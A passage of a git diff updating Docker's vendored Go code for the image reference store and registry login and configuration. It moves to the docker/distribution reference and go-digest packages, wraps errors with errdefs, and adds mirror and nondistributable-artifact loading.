+++ b/vendor/github.com/docker/docker/reference/store.go
@@ -1,38 +1,39 @@
-package reference
+package reference // import "github.com/docker/docker/reference"
 
 import (
 	"encoding/json"
-	"errors"
 	"fmt"
 	"os"
 	"path/filepath"
 	"sort"
 	"sync"
 
-	"github.com/docker/distribution/digest"
+	"github.com/docker/distribution/reference"
 	"github.com/docker/docker/pkg/ioutils"
+	"github.com/opencontainers/go-digest"
+	"github.com/pkg/errors"
 )
 
 var (
 	// ErrDoesNotExist is returned if a reference is not found in the
 	// store.
-	ErrDoesNotExist = errors.New("reference does not exist")
+	ErrDoesNotExist notFoundError = "reference does not exist"
 )
 
 // An Association is a tuple associating a reference with an image ID.
 type Association struct {
-	Ref Named
+	Ref reference.Named
 	ID  digest.Digest
 }
 
-// Store provides the set of methods which can operate on a tag store.
+// Store provides the set of methods which can operate on a reference store.
 type Store interface {
-	References(id digest.Digest) []Named
-	ReferencesByName(ref Named) []Association
-	AddTag(ref Named, id digest.Digest, force bool) error
-	AddDigest(ref Canonical, id digest.Digest, force bool) error
-	Delete(ref Named) (bool, error)
-	Get(ref Named) (digest.Digest, error)
+	References(id digest.Digest) []reference.Named
+	ReferencesByName(ref reference.Named) []Association
+	AddTag(ref reference.Named, id digest.Digest, force bool) error
+	AddDigest(ref reference.Canonical, id digest.Digest, force bool) error
+	Delete(ref reference.Named) (bool, error)
+	Get(ref reference.Named) (digest.Digest, error)
 }
 
 type store struct {
@@ -44,24 +45,28 @@ type store struct {
 	Repositories map[string]repository
 	// referencesByIDCache is a cache of references indexed by ID, to speed
 	// up References.
-	referencesByIDCache map[digest.Digest]map[string]Named
+	referencesByIDCache map[digest.Digest]map[string]reference.Named
 }
 
 // Repository maps tags to digests. The key is a stringified Reference,
 // including the repository name.
 type repository map[string]digest.Digest
 
-type lexicalRefs []Named
+type lexicalRefs []reference.Named
 
-func (a lexicalRefs) Len() int           { return len(a) }
-func (a lexicalRefs) Swap(i, j int)      { a[i], a[j] = a[j], a[i] }
-func (a lexicalRefs) Less(i, j int) bool { return a[i].String() < a[j].String() }
+func (a lexicalRefs) Len() int      { return len(a) }
+func (a lexicalRefs) Swap(i, j int) { a[i], a[j] = a[j], a[i] }
+func (a lexicalRefs) Less(i, j int) bool {
+	return a[i].String() < a[j].String()
+}
 
 type lexicalAssociations []Association
 
-func (a lexicalAssociations) Len() int           { return len(a) }
-func (a lexicalAssociations) Swap(i, j int)      { a[i], a[j] = a[j], a[i] }
-func (a lexicalAssociations) Less(i, j int) bool { return a[i].Ref.String() < a[j].Ref.String() }
+func (a lexicalAssociations) Len() int      { return len(a) }
+func (a lexicalAssociations) Swap(i, j int) { a[i], a[j] = a[j], a[i] }
+func (a lexicalAssociations) Less(i, j int) bool {
+	return a[i].Ref.String() < a[j].Ref.String()
+}
 
 // NewReferenceStore creates a new reference store, tied to a file path where
 // the set of references are serialized in JSON format.
@@ -74,7 +79,7 @@ func NewReferenceStore(jsonPath string) (Store, error) {
 	store := &store{
 		jsonPath:            abspath,
 		Repositories:        make(map[string]repository),
-		referencesByIDCache: make(map[digest.Digest]map[string]Named),
+		referencesByIDCache: make(map[digest.Digest]map[string]reference.Named),
 	}
 	// Load the json file if it exists, otherwise create it.
 	if err := store.reload(); os.IsNotExist(err) {
@@ -89,43 +94,72 @@ func NewReferenceStore(jsonPath string) (Store, error) {
 
 // AddTag adds a tag reference to the store. If force is set to true, existing
 // references can be overwritten. This only works for tags, not digests.
-func (store *store) AddTag(ref Named, id digest.Digest, force bool) error {
-	if _, isCanonical := ref.(Canonical); isCanonical {
-		return errors.New("refusing to create a tag with a digest reference")
+func (store *store) AddTag(ref reference.Named, id digest.Digest, force bool) error {
+	if _, isCanonical := ref.(reference.Canonical); isCanonical {
+		return errors.WithStack(invalidTagError("refusing to create a tag with a digest reference"))
 	}
-	return store.addReference(WithDefaultTag(ref), id, force)
+	return store.addReference(reference.TagNameOnly(ref), id, force)
 }
 
 // AddDigest adds a digest reference to the store.
-func (store *store) AddDigest(ref Canonical, id digest.Digest, force bool) error {
+func (store *store) AddDigest(ref reference.Canonical, id digest.Digest, force bool) error {
 	return store.addReference(ref, id, force)
 }
 
-func (store *store) addReference(ref Named, id digest.Digest, force bool) error {
-	if ref.Name() == string(digest.Canonical) {
-		return errors.New("refusing to create an ambiguous tag using digest algorithm as name")
+func favorDigest(originalRef reference.Named) (reference.Named, error) {
+	ref := originalRef
+	// If the reference includes a digest and a tag, we must store only the
+	// digest.
+	canonical, isCanonical := originalRef.(reference.Canonical)
+	_, isNamedTagged := originalRef.(reference.NamedTagged)
+
+	if isCanonical && isNamedTagged {
+		trimmed, err := reference.WithDigest(reference.TrimNamed(canonical), canonical.Digest())
+		if err != nil {
+			// should never happen
+			return originalRef, err
+		}
+		ref = trimmed
+	}
+	return ref, nil
+}
+
+func (store *store) addReference(ref reference.Named, id digest.Digest, force bool) error {
+	ref, err := favorDigest(ref)
+	if err != nil {
+		return err
+	}
+
+	refName := reference.FamiliarName(ref)
+	refStr := reference.FamiliarString(ref)
+
+	if refName == string(digest.Canonical) {
+		return errors.WithStack(invalidTagError("refusing to create an ambiguous tag using digest algorithm as name"))
 	}
 
 	store.mu.Lock()
 	defer store.mu.Unlock()
 
-	repository, exists := store.Repositories[ref.Name()]
+	repository, exists := store.Repositories[refName]
 	if !exists || repository == nil {
 		repository = make(map[string]digest.Digest)
-		store.Repositories[ref.Name()] = repository
+		store.Repositories[refName] = repository
 	}
 
-	refStr := ref.String()
 	oldID, exists := repository[refStr]
 
 	if exists {
 		// force only works for tags
-		if digested, isDigest := ref.(Canonical); isDigest {
-			return fmt.Errorf("Cannot overwrite digest %s", digested.Digest().String())
+		if digested, isDigest := ref.(reference.Canonical); isDigest {
+			return errors.WithStack(conflictingTagError("Cannot overwrite digest " + digested.Digest().String()))
 		}
 
 		if !force {
-			return fmt.Errorf("Conflict: Tag %s is already set to image %s, if you want to replace it, please use -f option", ref.String(), oldID.String())
+			return errors.WithStack(
+				conflictingTagError(
+					fmt.Sprintf("Conflict: Tag %s is already set to image %s, if you want to replace it, please use the force option", refStr, oldID.String()),
+				),
+			)
 		}
 
 		if store.referencesByIDCache[oldID] != nil {
@@ -138,7 +172,7 @@ func (store *store) addReference(ref Named, id digest.Digest, force bool) error
 
 	repository[refStr] = id
 	if store.referencesByIDCache[id] == nil {
-		store.referencesByIDCache[id] = make(map[string]Named)
+		store.referencesByIDCache[id] = make(map[string]reference.Named)
 	}
 	store.referencesByIDCache[id][refStr] = ref
 
@@ -147,24 +181,29 @@ func (store *store) addReference(ref Named, id digest.Digest, force bool) error
 
 // Delete deletes a reference from the store. It returns true if a deletion
 // happened, or false otherwise.
-func (store *store) Delete(ref Named) (bool, error) {
-	ref = WithDefaultTag(ref)
+func (store *store) Delete(ref reference.Named) (bool, error) {
+	ref, err := favorDigest(ref)
+	if err != nil {
+		return false, err
+	}
+
+	ref = reference.TagNameOnly(ref)
+
+	refName := reference.FamiliarName(ref)
+	refStr := reference.FamiliarString(ref)
 
 	store.mu.Lock()
 	defer store.mu.Unlock()
 
-	repoName := ref.Name()
-
-	repository, exists := store.Repositories[repoName]
+	repository, exists := store.Repositories[refName]
 	if !exists {
 		return false, ErrDoesNotExist
 	}
 
-	refStr := ref.String()
 	if id, exists := repository[refStr]; exists {
 		delete(repository, refStr)
 		if len(repository) == 0 {
-			delete(store.Repositories, repoName)
+			delete(store.Repositories, refName)
 		}
 		if store.referencesByIDCache[id] != nil {
 			delete(store.referencesByIDCache[id], refStr)
@@ -179,18 +218,34 @@ func (store *store) Delete(ref Named) (bool, error) {
 }
 
 // Get retrieves an item from the store by reference
-func (store *store) Get(ref Named) (digest.Digest, error) {
-	ref = WithDefaultTag(ref)
+func (store *store) Get(ref reference.Named) (digest.Digest, error) {
+	if canonical, ok := ref.(reference.Canonical); ok {
+		// If reference contains both tag and digest, only
+		// lookup by digest as it takes precedence over
+		// tag, until tag/digest combos are stored.
+		if _, ok := ref.(reference.Tagged); ok {
+			var err error
+			ref, err = reference.WithDigest(reference.TrimNamed(canonical), canonical.Digest())
+			if err != nil {
+				return "", err
+			}
+		}
+	} else {
+		ref = reference.TagNameOnly(ref)
+	}
+
+	refName := reference.FamiliarName(ref)
+	refStr := reference.FamiliarString(ref)
 
 	store.mu.RLock()
 	defer store.mu.RUnlock()
 
-	repository, exists := store.Repositories[ref.Name()]
+	repository, exists := store.Repositories[refName]
 	if !exists || repository == nil {
 		return "", ErrDoesNotExist
 	}
 
-	id, exists := repository[ref.String()]
+	id, exists := repository[refStr]
 	if !exists {
 		return "", ErrDoesNotExist
 	}
@@ -200,7 +255,7 @@ func (store *store) Get(ref Named) (digest.Digest, error) {
 
 // References returns a slice of references to the given ID. The slice
 // will be nil if there are no references to this ID.
-func (store *store) References(id digest.Digest) []Named {
+func (store *store) References(id digest.Digest) []reference.Named {
 	store.mu.RLock()
 	defer store.mu.RUnlock()
 
@@ -208,7 +263,7 @@ func (store *store) References(id digest.Digest) []Named {
 	// 1) We must not return a mutable
 	// 2) It would be ugly to expose the extraneous map keys to callers.
 
-	var references []Named
+	var references []reference.Named
 	for _, ref := range store.referencesByIDCache[id] {
 		references = append(references, ref)
 	}
@@ -221,18 +276,20 @@ func (store *store) References(id digest.Digest) []Named {
 // ReferencesByName returns the references for a given repository name.
 // If there are no references known for this repository name,
 // ReferencesByName returns nil.
-func (store *store) ReferencesByName(ref Named) []Association {
+func (store *store) ReferencesByName(ref reference.Named) []Association {
+	refName := reference.FamiliarName(ref)
+
 	store.mu.RLock()
 	defer store.mu.RUnlock()
 
-	repository, exists := store.Repositories[ref.Name()]
+	repository, exists := store.Repositories[refName]
 	if !exists {
 		return nil
 	}
 
 	var associations []Association
 	for refStr, refID := range repository {
-		ref, err := ParseNamed(refStr)
+		ref, err := reference.ParseNormalizedNamed(refStr)
 		if err != nil {
 			// Should never happen
 			return nil
@@ -270,13 +327,13 @@ func (store *store) reload() error {
 
 	for _, repository := range store.Repositories {
 		for refStr, refID := range repository {
-			ref, err := ParseNamed(refStr)
+			ref, err := reference.ParseNormalizedNamed(refStr)
 			if err != nil {
 				// Should never happen
 				continue
 			}
 			if store.referencesByIDCache[refID] == nil {
-				store.referencesByIDCache[refID] = make(map[string]Named)
+				store.referencesByIDCache[refID] = make(map[string]reference.Named)
 			}
 			store.referencesByIDCache[refID][refStr] = ref
 		}
diff --git a/vendor/github.com/docker/docker/reference/store_test.go b/vendor/github.com/docker/docker/reference/store_test.go
index dd1d253d8e..1ce674cbfb 100644
--- a/vendor/github.com/docker/docker/reference/store_test.go
+++ b/vendor/github.com/docker/docker/reference/store_test.go
@@ -1,4 +1,4 @@
-package reference
+package reference // import "github.com/docker/docker/reference"
 
 import (
 	"bytes"
@@ -8,7 +8,10 @@ import (
 	"strings"
 	"testing"
 
-	"github.com/docker/distribution/digest"
+	"github.com/docker/distribution/reference"
+	"github.com/opencontainers/go-digest"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
 )
 
 var (
@@ -45,7 +48,7 @@ func TestLoad(t *testing.T) {
 	}
 
 	for refStr, expectedID := range saveLoadTestCases {
-		ref, err := ParseNamed(refStr)
+		ref, err := reference.ParseNormalizedNamed(refStr)
 		if err != nil {
 			t.Fatalf("failed to parse reference: %v", err)
 		}
@@ -61,10 +64,10 @@ func TestLoad(t *testing.T) {
 
 func TestSave(t *testing.T) {
 	jsonFile, err := ioutil.TempFile("", "tag-store-test")
-	if err != nil {
-		t.Fatalf("error creating temp file: %v", err)
-	}
+	assert.NilError(t, err)
+
 	_, err = jsonFile.Write([]byte(`{}`))
+	assert.NilError(t, err)
 	jsonFile.Close()
 	defer os.RemoveAll(jsonFile.Name())
 
@@ -74,11 +77,11 @@ func TestSave(t *testing.T) {
 	}
 
 	for refStr, id := range saveLoadTestCases {
-		ref, err := ParseNamed(refStr)
+		ref, err := reference.ParseNormalizedNamed(refStr)
 		if err != nil {
 			t.Fatalf("failed to parse reference: %v", err)
 		}
-		if canonical, ok := ref.(Canonical); ok {
+		if canonical, ok := ref.(reference.Canonical); ok {
 			err = store.AddDigest(canonical, id, false)
 			if err != nil {
 				t.Fatalf("could not add digest reference %s: %v", refStr, err)
@@ -120,7 +123,7 @@ func TestAddDeleteGet(t *testing.T) {
 	testImageID3 := digest.Digest("sha256:9655aef5fd742a1b4e1b7b163aa9f1c76c186304bf39102283d80927c916ca9e")
 
 	// Try adding a reference with no tag or digest
-	nameOnly, err := WithName("username/repo")
+	nameOnly, err := reference.ParseNormalizedNamed("username/repo")
 	if err != nil {
 		t.Fatalf("could not parse reference: %v", err)
 	}
@@ -129,7 +132,7 @@ func TestAddDeleteGet(t *testing.T) {
 	}
 
 	// Add a few references
-	ref1, err := ParseNamed("username/repo1:latest")
+	ref1, err := reference.ParseNormalizedNamed("username/repo1:latest")
 	if err != nil {
 		t.Fatalf("could not parse reference: %v", err)
 	}
@@ -137,7 +140,7 @@ func TestAddDeleteGet(t *testing.T) {
 		t.Fatalf("error adding to store: %v", err)
 	}
 
-	ref2, err := ParseNamed("username/repo1:old")
+	ref2, err := reference.ParseNormalizedNamed("username/repo1:old")
 	if err != nil {
 		t.Fatalf("could not parse reference: %v", err)
 	}
@@ -145,7 +148,7 @@ func TestAddDeleteGet(t *testing.T) {
 		t.Fatalf("error adding to store: %v", err)
 	}
 
-	ref3, err := ParseNamed("username/repo1:alias")
+	ref3, err := reference.ParseNormalizedNamed("username/repo1:alias")
 	if err != nil {
 		t.Fatalf("could not parse reference: %v", err)
 	}
@@ -153,7 +156,7 @@ func TestAddDeleteGet(t *testing.T) {
 		t.Fatalf("error adding to store: %v", err)
 	}
 
-	ref4, err := ParseNamed("username/repo2:latest")
+	ref4, err := reference.ParseNormalizedNamed("username/repo2:latest")
 	if err != nil {
 		t.Fatalf("could not parse reference: %v", err)
 	}
@@ -161,11 +164,11 @@ func TestAddDeleteGet(t *testing.T) {
 		t.Fatalf("error adding to store: %v", err)
 	}
 
-	ref5, err := ParseNamed("username/repo3@sha256:58153dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c")
+	ref5, err := reference.ParseNormalizedNamed("username/repo3@sha256:58153dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c")
 	if err != nil {
 		t.Fatalf("could not parse reference: %v", err)
 	}
-	if err = store.AddDigest(ref5.(Canonical), testImageID2, false); err != nil {
+	if err = store.AddDigest(ref5.(reference.Canonical), testImageID2, false); err != nil {
 		t.Fatalf("error adding to store: %v", err)
 	}
 
@@ -228,7 +231,7 @@ func TestAddDeleteGet(t *testing.T) {
 	}
 
 	// Get should return ErrDoesNotExist for a nonexistent repo
-	nonExistRepo, err := ParseNamed("username/nonexistrepo:latest")
+	nonExistRepo, err := reference.ParseNormalizedNamed("username/nonexistrepo:latest")
 	if err != nil {
 		t.Fatalf("could not parse reference: %v", err)
 	}
@@ -237,7 +240,7 @@ func TestAddDeleteGet(t *testing.T) {
 	}
 
 	// Get should return ErrDoesNotExist for a nonexistent tag
-	nonExistTag, err := ParseNamed("username/repo1:nonexist")
+	nonExistTag, err := reference.ParseNormalizedNamed("username/repo1:nonexist")
 	if err != nil {
 		t.Fatalf("could not parse reference: %v", err)
 	}
@@ -263,7 +266,7 @@ func TestAddDeleteGet(t *testing.T) {
 	}
 
 	// Check ReferencesByName
-	repoName, err := WithName("username/repo1")
+	repoName, err := reference.ParseNormalizedNamed("username/repo1")
 	if err != nil {
 		t.Fatalf("could not parse reference: %v", err)
 	}
@@ -303,19 +306,19 @@ func TestAddDeleteGet(t *testing.T) {
 	}
 
 	// Delete a few references
-	if deleted, err := store.Delete(ref1); err != nil || deleted != true {
+	if deleted, err := store.Delete(ref1); err != nil || !deleted {
 		t.Fatal("Delete failed")
 	}
 	if _, err := store.Get(ref1); err != ErrDoesNotExist {
 		t.Fatal("Expected ErrDoesNotExist from Get")
 	}
-	if deleted, err := store.Delete(ref5); err != nil || deleted != true {
+	if deleted, err := store.Delete(ref5); err != nil || !deleted {
 		t.Fatal("Delete failed")
 	}
 	if _, err := store.Get(ref5); err != ErrDoesNotExist {
 		t.Fatal("Expected ErrDoesNotExist from Get")
 	}
-	if deleted, err := store.Delete(nameOnly); err != nil || deleted != true {
+	if deleted, err := store.Delete(nameOnly); err != nil || !deleted {
 		t.Fatal("Delete failed")
 	}
 	if _, err := store.Get(nameOnly); err != ErrDoesNotExist {
@@ -325,32 +328,23 @@ func TestAddDeleteGet(t *testing.T) {
 
 func TestInvalidTags(t *testing.T) {
 	tmpDir, err := ioutil.TempDir("", "tag-store-test")
+	assert.NilError(t, err)
 	defer os.RemoveAll(tmpDir)
 
 	store, err := NewReferenceStore(filepath.Join(tmpDir, "repositories.json"))
-	if err != nil {
-		t.Fatalf("error creating tag store: %v", err)
-	}
+	assert.NilError(t, err)
 	id := digest.Digest("sha256:470022b8af682154f57a2163d030eb369549549cba00edc69e1b99b46bb924d6")
 
 	// sha256 as repo name
-	ref, err := ParseNamed("sha256:abc")
-	if err != nil {
-		t.Fatal(err)
-	}
+	ref, err := reference.ParseNormalizedNamed("sha256:abc")
+	assert.NilError(t, err)
 	err = store.AddTag(ref, id, true)
-	if err == nil {
-		t.Fatalf("expected setting tag %q to fail", ref)
-	}
+	assert.Check(t, is.ErrorContains(err, ""))
 
 	// setting digest as a tag
-	ref, err = ParseNamed("registry@sha256:367eb40fd0330a7e464777121e39d2f5b3e8e23a1e159342e53ab05c9e4d94e6")
-	if err != nil {
-		t.Fatal(err)
-	}
-	err = store.AddTag(ref, id, true)
-	if err == nil {
-		t.Fatalf("expected setting digest %q to fail", ref)
-	}
+	ref, err = reference.ParseNormalizedNamed("registry@sha256:367eb40fd0330a7e464777121e39d2f5b3e8e23a1e159342e53ab05c9e4d94e6")
+	assert.NilError(t, err)
 
+	err = store.AddTag(ref, id, true)
+	assert.Check(t, is.ErrorContains(err, ""))
 }
diff --git a/vendor/github.com/docker/docker/registry/auth.go b/vendor/github.com/docker/docker/registry/auth.go
index 8cadd51ba0..1f2043a0d9 100644
--- a/vendor/github.com/docker/docker/registry/auth.go
+++ b/vendor/github.com/docker/docker/registry/auth.go
@@ -1,19 +1,20 @@
-package registry
+package registry // import "github.com/docker/docker/registry"
 
 import (
-	"fmt"
 	"io/ioutil"
 	"net/http"
 	"net/url"
 	"strings"
 	"time"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/distribution/registry/client/auth"
 	"github.com/docker/distribution/registry/client/auth/challenge"
 	"github.com/docker/distribution/registry/client/transport"
 	"github.com/docker/docker/api/types"
 	registrytypes "github.com/docker/docker/api/types/registry"
+	"github.com/docker/docker/errdefs"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
 )
 
 const (
@@ -23,21 +24,15 @@ const (
 
 // loginV1 tries to register/login to the v1 registry server.
 func loginV1(authConfig *types.AuthConfig, apiEndpoint APIEndpoint, userAgent string) (string, string, error) {
-	registryEndpoint, err := apiEndpoint.ToV1Endpoint(userAgent, nil)
-	if err != nil {
-		return "", "", err
-	}
-
+	registryEndpoint := apiEndpoint.ToV1Endpoint(userAgent, nil)
 	serverAddress := registryEndpoint.String()
 
 	logrus.Debugf("attempting v1 login to registry endpoint %s", serverAddress)
 
 	if serverAddress == "" {
-		return "", "", fmt.Errorf("Server Error: Server Address not set.")
+		return "", "", errdefs.System(errors.New("server Error: Server Address not set"))
 	}
 
-	loginAgainstOfficialIndex := serverAddress == IndexServer
-
 	req, err := http.NewRequest("GET", serverAddress+"users/", nil)
 	if err != nil {
 		return "", "", err
@@ -53,27 +48,23 @@ func loginV1(authConfig *types.AuthConfig, apiEndpoint APIEndpoint, userAgent st
 	defer resp.Body.Close()
 	body, err := ioutil.ReadAll(resp.Body)
 	if err != nil {
-		return "", "", err
+		return "", "", errdefs.System(err)
 	}
-	if resp.StatusCode == http.StatusOK {
+
+	switch resp.StatusCode {
+	case http.StatusOK:
 		return "Login Succeeded", "", nil
-	} else if resp.StatusCode == http.StatusUnauthorized {
-		if loginAgainstOfficialIndex {
-			return "", "", fmt.Errorf("Wrong login/password, please try again. Haven't got a Docker ID? Create one at https://hub.docker.com")
-		}
-		return "", "", fmt.Errorf("Wrong login/password, please try again")
-	} else if resp.StatusCode == http.StatusForbidden {
-		if loginAgainstOfficialIndex {
-			return "", "", fmt.Errorf("Login: Account is not active. Please check your e-mail for a confirmation link.")
-		}
+	case http.StatusUnauthorized:
+		return "", "", errdefs.Unauthorized(errors.New("Wrong login/password, please try again"))
+	case http.StatusForbidden:
 		// *TODO: Use registry configuration to determine what this says, if anything?
-		return "", "", fmt.Errorf("Login: Account is not active. Please see the documentation of the registry %s for instructions how to activate it.", serverAddress)
-	} else if resp.StatusCode == http.StatusInternalServerError { // Issue #14326
+		return "", "", errdefs.Forbidden(errors.Errorf("Login: Account is not active. Please see the documentation of the registry %s for instructions how to activate it.", serverAddress))
+	case http.StatusInternalServerError:
 		logrus.Errorf("%s returned status code %d. Response Body :\n%s", req.URL.String(), resp.StatusCode, body)
-		return "", "", fmt.Errorf("Internal Server Error")
+		return "", "", errdefs.System(errors.New("Internal Server Error"))
 	}
-	return "", "", fmt.Errorf("Login: %s (Code: %d; Headers: %s)", body,
-		resp.StatusCode, resp.Header)
+	return "", "", errdefs.System(errors.Errorf("Login: %s (Code: %d; Headers: %s)", body,
+		resp.StatusCode, resp.Header))
 }
 
 type loginCredentialStore struct {
@@ -135,7 +126,7 @@ func (err fallbackError) Error() string {
 func loginV2(authConfig *types.AuthConfig, endpoint APIEndpoint, userAgent string) (string, string, error) {
 	logrus.Debugf("attempting v2 login to registry endpoint %s", strings.TrimRight(endpoint.URL.String(), "/")+"/v2/")
 
-	modifiers := DockerHeaders(userAgent, nil)
+	modifiers := Headers(userAgent, nil)
 	authTransport := transport.NewTransport(NewTransport(endpoint.TLSConfig), modifiers...)
 
 	credentialAuthConfig := *authConfig
@@ -159,24 +150,25 @@ func loginV2(authConfig *types.AuthConfig, endpoint APIEndpoint, userAgent strin
 
 	resp, err := loginClient.Do(req)
 	if err != nil {
+		err = translateV2AuthError(err)
 		if !foundV2 {
 			err = fallbackError{err: err}
 		}
+
 		return "", "", err
 	}
 	defer resp.Body.Close()
 
-	if resp.StatusCode != http.StatusOK {
-		// TODO(dmcgowan): Attempt to further interpret result, status code and error code string
-		err := fmt.Errorf("login attempt to %s failed with status: %d %s", endpointStr, resp.StatusCode, http.StatusText(resp.StatusCode))
-		if !foundV2 {
-			err = fallbackError{err: err}
-		}
-		return "", "", err
+	if resp.StatusCode == http.StatusOK {
+		return "Login Succeeded", credentialAuthConfig.IdentityToken, nil
 	}
 
-	return "Login Succeeded", credentialAuthConfig.IdentityToken, nil
-
+	// TODO(dmcgowan): Attempt to further interpret result, status code and error code string
+	err = errors.Errorf("login attempt to %s failed with status: %d %s", endpointStr, resp.StatusCode, http.StatusText(resp.StatusCode))
+	if !foundV2 {
+		err = fallbackError{err: err}
+	}
+	return "", "", err
 }
 
 func v2AuthHTTPClient(endpoint *url.URL, authTransport http.RoundTripper, modifiers []transport.RequestModifier, creds auth.CredentialStore, scopes []auth.Scope) (*http.Client, bool, error) {
@@ -256,6 +248,7 @@ func (err PingResponseError) Error() string {
 // challenge manager for the supported authentication types and
 // whether v2 was confirmed by the response. If a response is received but
 // cannot be interpreted a PingResponseError will be returned.
+// nolint: interfacer
 func PingV2Registry(endpoint *url.URL, transport http.RoundTripper) (challenge.Manager, bool, error) {
 	var (
 		foundV2   = false
diff --git a/vendor/github.com/docker/docker/registry/auth_test.go b/vendor/github.com/docker/docker/registry/auth_test.go
index 9ab71aa4fb..f8f3e1997b 100644
--- a/vendor/github.com/docker/docker/registry/auth_test.go
+++ b/vendor/github.com/docker/docker/registry/auth_test.go
@@ -1,8 +1,4 @@
-// +build !solaris
-
-// TODO: Support Solaris
-
-package registry
+package registry // import "github.com/docker/docker/registry"
 
 import (
 	"testing"
diff --git a/vendor/github.com/docker/docker/registry/config.go b/vendor/github.com/docker/docker/registry/config.go
index 9a4f6a9251..de5a526b69 100644
--- a/vendor/github.com/docker/docker/registry/config.go
+++ b/vendor/github.com/docker/docker/registry/config.go
@@ -1,22 +1,24 @@
-package registry
+package registry // import "github.com/docker/docker/registry"
 
 import (
-	"errors"
 	"fmt"
 	"net"
 	"net/url"
+	"regexp"
+	"strconv"
 	"strings"
 
+	"github.com/docker/distribution/reference"
 	registrytypes "github.com/docker/docker/api/types/registry"
-	"github.com/docker/docker/opts"
-	"github.com/docker/docker/reference"
-	"github.com/spf13/pflag"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
 )
 
 // ServiceOptions holds command line options.
 type ServiceOptions struct {
-	Mirrors            []string `json:"registry-mirrors,omitempty"`
-	InsecureRegistries []string `json:"insecure-registries,omitempty"`
+	AllowNondistributableArtifacts []string `json:"allow-nondistributable-artifacts,omitempty"`
+	Mirrors                        []string `json:"registry-mirrors,omitempty"`
+	InsecureRegistries             []string `json:"insecure-registries,omitempty"`
 
 	// V2Only controls access to legacy registries.  If it is set to true via the
 	// command line flag the daemon will not attempt to contact v1 legacy registries
@@ -43,9 +45,6 @@ var (
 	// IndexName is the name of the index
 	IndexName = "docker.io"
 
-	// NotaryServer is the endpoint serving the Notary trust server
-	NotaryServer = "https://notary.docker.io"
-
 	// DefaultV2Registry is the URI of the default v2 registry
 	DefaultV2Registry = &url.URL{
 		Scheme: "https",
@@ -58,40 +57,105 @@ var (
 	// not have the correct form
 	ErrInvalidRepositoryName = errors.New("Invalid repository name (ex: \"registry.domain.tld/myrepos\")")
 
-	emptyServiceConfig = newServiceConfig(ServiceOptions{})
+	emptyServiceConfig, _ = newServiceConfig(ServiceOptions{})
+)
+
+var (
+	validHostPortRegex = regexp.MustCompile(`^` + reference.DomainRegexp.String() + `$`)
 )
 
 // for mocking in unit tests
 var lookupIP = net.LookupIP
 
-// InstallCliFlags adds command-line options to the top-level flag parser for
-// the current process.
-func (options *ServiceOptions) InstallCliFlags(flags *pflag.FlagSet) {
-	mirrors := opts.NewNamedListOptsRef("registry-mirrors", &options.Mirrors, ValidateMirror)
-	insecureRegistries := opts.NewNamedListOptsRef("insecure-registries", &options.InsecureRegistries, ValidateIndexName)
-
-	flags.Var(mirrors, "registry-mirror", "Preferred Docker registry mirror")
-	flags.Var(insecureRegistries, "insecure-registry", "Enable insecure registry communication")
-
-	options.installCliPlatformFlags(flags)
-}
-
 // newServiceConfig returns a new instance of ServiceConfig
-func newServiceConfig(options ServiceOptions) *serviceConfig {
+func newServiceConfig(options ServiceOptions) (*serviceConfig, error) {
 	config := &serviceConfig{
 		ServiceConfig: registrytypes.ServiceConfig{
 			InsecureRegistryCIDRs: make([]*registrytypes.NetIPNet, 0),
-			IndexConfigs:          make(map[string]*registrytypes.IndexInfo, 0),
+			IndexConfigs:          make(map[string]*registrytypes.IndexInfo),
 			// Hack: Bypass setting the mirrors to IndexConfigs since they are going away
 			// and Mirrors are only for the official registry anyways.
-			Mirrors: options.Mirrors,
 		},
 		V2Only: options.V2Only,
 	}
+	if err := config.LoadAllowNondistributableArtifacts(options.AllowNondistributableArtifacts); err != nil {
+		return nil, err
+	}
+	if err := config.LoadMirrors(options.Mirrors); err != nil {
+		return nil, err
+	}
+	if err := config.LoadInsecureRegistries(options.InsecureRegistries); err != nil {
+		return nil, err
+	}
+
+	return config, nil
+}
+
+// LoadAllowNondistributableArtifacts loads allow-nondistributable-artifacts registries into config.
+func (config *serviceConfig) LoadAllowNondistributableArtifacts(registries []string) error {
+	cidrs := map[string]*registrytypes.NetIPNet{}
+	hostnames := map[string]bool{}
+
+	for _, r := range registries {
+		if _, err := ValidateIndexName(r); err != nil {
+			return err
+		}
+		if validateNoScheme(r) != nil {
+			return fmt.Errorf("allow-nondistributable-artifacts registry %s should not contain '://'", r)
+		}
+
+		if _, ipnet, err := net.ParseCIDR(r); err == nil {
+			// Valid CIDR.
+			cidrs[ipnet.String()] = (*registrytypes.NetIPNet)(ipnet)
+		} else if err := validateHostPort(r); err == nil {
+			// Must be `host:port` if not CIDR.
+			hostnames[r] = true
+		} else {
+			return fmt.Errorf("allow-nondistributable-artifacts registry %s is not valid: %v", r, err)
+		}
+	}
+
+	config.AllowNondistributableArtifactsCIDRs = make([]*(registrytypes.NetIPNet), 0)
+	for _, c := range cidrs {
+		config.AllowNondistributableArtifactsCIDRs = append(config.AllowNondistributableArtifactsCIDRs, c)
+	}
+
+	config.AllowNondistributableArtifactsHostnames = make([]string, 0)
+	for h := range hostnames {
+		config.AllowNondistributableArtifactsHostnames = append(config.AllowNondistributableArtifactsHostnames, h)
+	}
+
+	return nil
+}
+
+// LoadMirrors loads mirrors to config, after removing duplicates.
+// Returns an error if mirrors contains an invalid mirror.
+func (config *serviceConfig) LoadMirrors(mirrors []string) error {
+	mMap := map[string]struct{}{}
+	unique := []string{}
+
+	for _, mirror := range mirrors {
+		m, err := ValidateMirror(mirror)
+		if err != nil {
+			return err
+		}
+		if _, exist := mMap[m]; !exist {
+			mMap[m] = struct{}{}
+			unique = append(unique, m)
+		}
+	}
+
+	config.Mirrors = unique
 
-	config.LoadInsecureRegistries(options.InsecureRegistries)
+	// Configure public registry since mirrors may have changed.
+	config.IndexConfigs[IndexName] = &registrytypes.IndexInfo{
+		Name:     IndexName,
+		Mirrors:  config.Mirrors,
+		Secure:   true,
+		Official: true,
+	}
 
-	return config
+	return nil
 }
 
 // LoadInsecureRegistries loads insecure registries to config
@@ -109,7 +173,7 @@ func (config *serviceConfig) LoadInsecureRegistries(registries []string) error {
 	originalIndexInfos := config.ServiceConfig.IndexConfigs
 
 	config.ServiceConfig.InsecureRegistryCIDRs = make([]*registrytypes.NetIPNet, 0)
